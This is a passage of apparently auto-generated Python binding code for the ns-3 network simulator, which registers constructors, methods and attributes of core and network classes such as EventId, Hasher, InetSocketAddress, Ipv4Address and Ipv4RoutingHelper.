start, int32_t end) [member function] cls.add_method('Add', 'ns3::TagBuffer', [param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')]) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function] cls.add_method('Add', 'void', [param('ns3::ByteTagList const &', 'o')]) ## byte-tag-list.h (module 'network'): void 
ns3::ByteTagList::AddAtEnd(int32_t appendOffset) [member function] cls.add_method('AddAtEnd', 'void', [param('int32_t', 'appendOffset')]) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t prependOffset) [member function] cls.add_method('AddAtStart', 'void', [param('int32_t', 'prependOffset')]) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Adjust(int32_t adjustment) [member function] cls.add_method('Adjust', 'void', [param('int32_t', 'adjustment')]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function] cls.add_method('Begin', 'ns3::ByteTagList::Iterator', [param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')], is_const=True) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function] cls.add_method('RemoveAll', 'void', []) return def register_Ns3ByteTagListIterator_methods(root_module, cls): ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')]) ## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function] cls.add_method('GetOffsetStart', 'uint32_t', [], is_const=True) ## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function] cls.add_method('Next', 'ns3::ByteTagList::Iterator::Item', []) return def register_Ns3ByteTagListIteratorItem_methods(root_module, cls): ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor] 
cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor] cls.add_constructor([param('ns3::TagBuffer', 'buf')]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable] cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable] cls.add_instance_attribute('end', 'int32_t', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable] cls.add_instance_attribute('size', 'uint32_t', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable] cls.add_instance_attribute('start', 'int32_t', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable] cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False) return def register_Ns3CallbackBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function] cls.add_method('GetImpl', 'ns3::Ptr< ns3::CallbackImplBase >', [], is_const=True) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')], visibility='protected') return def register_Ns3EventGarbageCollector_methods(root_module, cls): ## event-garbage-collector.h (module 'core'): ns3::EventGarbageCollector::EventGarbageCollector(ns3::EventGarbageCollector const & arg0) [copy constructor] 
cls.add_constructor([param('ns3::EventGarbageCollector const &', 'arg0')]) ## event-garbage-collector.h (module 'core'): ns3::EventGarbageCollector::EventGarbageCollector() [constructor] cls.add_constructor([]) ## event-garbage-collector.h (module 'core'): void ns3::EventGarbageCollector::Track(ns3::EventId event) [member function] cls.add_method('Track', 'void', [param('ns3::EventId', 'event')]) return def register_Ns3EventId_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_binary_comparison_operator('==') ## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor] cls.add_constructor([param('ns3::EventId const &', 'arg0')]) ## event-id.h (module 'core'): ns3::EventId::EventId() [constructor] cls.add_constructor([]) ## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')]) ## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function] cls.add_method('Cancel', 'void', []) ## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function] cls.add_method('GetContext', 'uint32_t', [], is_const=True) ## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function] cls.add_method('GetTs', 'uint64_t', [], is_const=True) ## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function] cls.add_method('GetUid', 'uint32_t', [], is_const=True) ## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function] cls.add_method('IsExpired', 'bool', [], is_const=True) ## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function] cls.add_method('IsRunning', 'bool', [], is_const=True) ## event-id.h (module 'core'): ns3::EventImpl * 
ns3::EventId::PeekEventImpl() const [member function] cls.add_method('PeekEventImpl', 'ns3::EventImpl *', [], is_const=True) return def register_Ns3Hasher_methods(root_module, cls): ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hasher const &', 'arg0')]) ## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor] cls.add_constructor([]) ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function] cls.add_method('GetHash32', 'uint32_t', [param('std::string const', 's')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function] cls.add_method('GetHash64', 'uint64_t', [param('std::string const', 's')]) ## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function] cls.add_method('clear', 'ns3::Hasher &', []) return def register_Ns3Inet6SocketAddress_methods(root_module, cls): ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Inet6SocketAddress const & arg0) [copy constructor] cls.add_constructor([param('ns3::Inet6SocketAddress const &', 'arg0')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6, uint16_t port) [constructor] cls.add_constructor([param('ns3::Ipv6Address', 
'ipv6'), param('uint16_t', 'port')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6) [constructor] cls.add_constructor([param('ns3::Ipv6Address', 'ipv6')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(uint16_t port) [constructor] cls.add_constructor([param('uint16_t', 'port')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6, uint16_t port) [constructor] cls.add_constructor([param('char const *', 'ipv6'), param('uint16_t', 'port')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6) [constructor] cls.add_constructor([param('char const *', 'ipv6')]) ## inet6-socket-address.h (module 'network'): static ns3::Inet6SocketAddress ns3::Inet6SocketAddress::ConvertFrom(ns3::Address const & addr) [member function] cls.add_method('ConvertFrom', 'ns3::Inet6SocketAddress', [param('ns3::Address const &', 'addr')], is_static=True) ## inet6-socket-address.h (module 'network'): ns3::Ipv6Address ns3::Inet6SocketAddress::GetIpv6() const [member function] cls.add_method('GetIpv6', 'ns3::Ipv6Address', [], is_const=True) ## inet6-socket-address.h (module 'network'): uint16_t ns3::Inet6SocketAddress::GetPort() const [member function] cls.add_method('GetPort', 'uint16_t', [], is_const=True) ## inet6-socket-address.h (module 'network'): static bool ns3::Inet6SocketAddress::IsMatchingType(ns3::Address const & addr) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'addr')], is_static=True) ## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetIpv6(ns3::Ipv6Address ipv6) [member function] cls.add_method('SetIpv6', 'void', [param('ns3::Ipv6Address', 'ipv6')]) ## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetPort(uint16_t port) [member function] cls.add_method('SetPort', 
'void', [param('uint16_t', 'port')]) return def register_Ns3InetSocketAddress_methods(root_module, cls): ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::InetSocketAddress const & arg0) [copy constructor] cls.add_constructor([param('ns3::InetSocketAddress const &', 'arg0')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4, uint16_t port) [constructor] cls.add_constructor([param('ns3::Ipv4Address', 'ipv4'), param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4) [constructor] cls.add_constructor([param('ns3::Ipv4Address', 'ipv4')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(uint16_t port) [constructor] cls.add_constructor([param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4, uint16_t port) [constructor] cls.add_constructor([param('char const *', 'ipv4'), param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4) [constructor] cls.add_constructor([param('char const *', 'ipv4')]) ## inet-socket-address.h (module 'network'): static ns3::InetSocketAddress ns3::InetSocketAddress::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::InetSocketAddress', [param('ns3::Address const &', 'address')], is_static=True) ## inet-socket-address.h (module 'network'): ns3::Ipv4Address ns3::InetSocketAddress::GetIpv4() const [member function] cls.add_method('GetIpv4', 'ns3::Ipv4Address', [], is_const=True) ## inet-socket-address.h (module 'network'): uint16_t ns3::InetSocketAddress::GetPort() const [member function] cls.add_method('GetPort', 'uint16_t', [], is_const=True) ## inet-socket-address.h (module 'network'): uint8_t ns3::InetSocketAddress::GetTos() const 
[member function] cls.add_method('GetTos', 'uint8_t', [], is_const=True) ## inet-socket-address.h (module 'network'): static bool ns3::InetSocketAddress::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetIpv4(ns3::Ipv4Address address) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ipv4Address', 'address')]) ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetPort(uint16_t port) [member function] cls.add_method('SetPort', 'void', [param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetTos(uint8_t tos) [member function] cls.add_method('SetTos', 'void', [param('uint8_t', 'tos')]) return def register_Ns3IntToType__0_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType(ns3::IntToType<0> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 0 > const &', 'arg0')]) return def register_Ns3IntToType__1_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType(ns3::IntToType<1> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 1 > const &', 'arg0')]) return def register_Ns3IntToType__2_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType(ns3::IntToType<2> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 2 > const &', 'arg0')]) return def register_Ns3IntToType__3_methods(root_module, cls): ## int-to-type.h (module 
'core'): ns3::IntToType<3>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<3>::IntToType(ns3::IntToType<3> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 3 > const &', 'arg0')]) return def register_Ns3IntToType__4_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType(ns3::IntToType<4> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 4 > const &', 'arg0')]) return def register_Ns3IntToType__5_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType(ns3::IntToType<5> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 5 > const &', 'arg0')]) return def register_Ns3IntToType__6_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType(ns3::IntToType<6> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 6 > const &', 'arg0')]) return def register_Ns3Ipv4Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor] cls.add_constructor([param('uint32_t', 'address')]) ## ipv4-address.h (module 
'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('CombineMask', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv4Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv4Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function] cls.add_method('GetBroadcast', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('GetSubnetDirectedBroadcast', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Address', [], is_static=True) ## 
ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Address const &', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function] cls.add_method('IsLocalMulticast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('IsSubnetDirectedBroadcast', 'bool', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function] cls.add_method('Set', 'void', 
[param('uint32_t', 'address')]) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function] cls.add_method('Set', 'void', [param('char const *', 'address')]) return def register_Ns3Ipv4InterfaceAddress_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress() [constructor] cls.add_constructor([]) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4Address local, ns3::Ipv4Mask mask) [constructor] cls.add_constructor([param('ns3::Ipv4Address', 'local'), param('ns3::Ipv4Mask', 'mask')]) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4InterfaceAddress const & o) [copy constructor] cls.add_constructor([param('ns3::Ipv4InterfaceAddress const &', 'o')]) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetBroadcast() const [member function] cls.add_method('GetBroadcast', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetLocal() const [member function] cls.add_method('GetLocal', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Mask ns3::Ipv4InterfaceAddress::GetMask() const [member function] cls.add_method('GetMask', 'ns3::Ipv4Mask', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e ns3::Ipv4InterfaceAddress::GetScope() const [member function] cls.add_method('GetScope', 'ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): bool ns3::Ipv4InterfaceAddress::IsSecondary() const [member function] cls.add_method('IsSecondary', 'bool', [], 
is_const=True) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetBroadcast(ns3::Ipv4Address broadcast) [member function] cls.add_method('SetBroadcast', 'void', [param('ns3::Ipv4Address', 'broadcast')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetLocal(ns3::Ipv4Address local) [member function] cls.add_method('SetLocal', 'void', [param('ns3::Ipv4Address', 'local')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetMask(ns3::Ipv4Mask mask) [member function] cls.add_method('SetMask', 'void', [param('ns3::Ipv4Mask', 'mask')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetPrimary() [member function] cls.add_method('SetPrimary', 'void', []) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetScope(ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function] cls.add_method('SetScope', 'void', [param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetSecondary() [member function] cls.add_method('SetSecondary', 'void', []) return def register_Ns3Ipv4Mask_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor] cls.add_constructor([param('uint32_t', 'mask')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor] cls.add_constructor([param('char const *', 'mask')]) ## ipv4-address.h (module 'network'): 
uint32_t ns3::Ipv4Mask::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function] cls.add_method('GetInverse', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function] cls.add_method('GetPrefixLength', 'uint16_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Mask', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function] cls.add_method('Set', 'void', [param('uint32_t', 'mask')]) return def register_Ns3Ipv4RoutingHelper_methods(root_module, cls): ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper::Ipv4RoutingHelper() [constructor] cls.add_constructor([]) ## ipv4-routing-helper.h (module 'internet'): 
ns3::Ipv4RoutingHelper::Ipv4RoutingHelper(ns3::Ipv4RoutingHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4RoutingHelper const &', 'arg0')]) ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper * ns3::Ipv4RoutingHelper::Copy() const [member function] cls.add_method('Copy', 'ns3::Ipv4RoutingHelper *', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4-routing-helper.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4RoutingHelper::Create(ns3::Ptr<ns3::Node> node) const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [param('ns3::Ptr< ns3::Node >', 'node')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheAllAt(ns3::Time printTime, ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheAllAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheAllEvery(ns3::Time printInterval, ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheAllEvery', 'void', [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheAt(ns3::Time printTime, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheEvery(ns3::Time printInterval, ns3::Ptr<ns3::Node> node, 
ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheEvery', 'void', [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableAllAt(ns3::Time printTime, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableAllAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableAllEvery(ns3::Time printInterval, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableAllEvery', 'void', [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableAt(ns3::Time printTime, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableEvery(ns3::Time printInterval, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableEvery', 'void', 
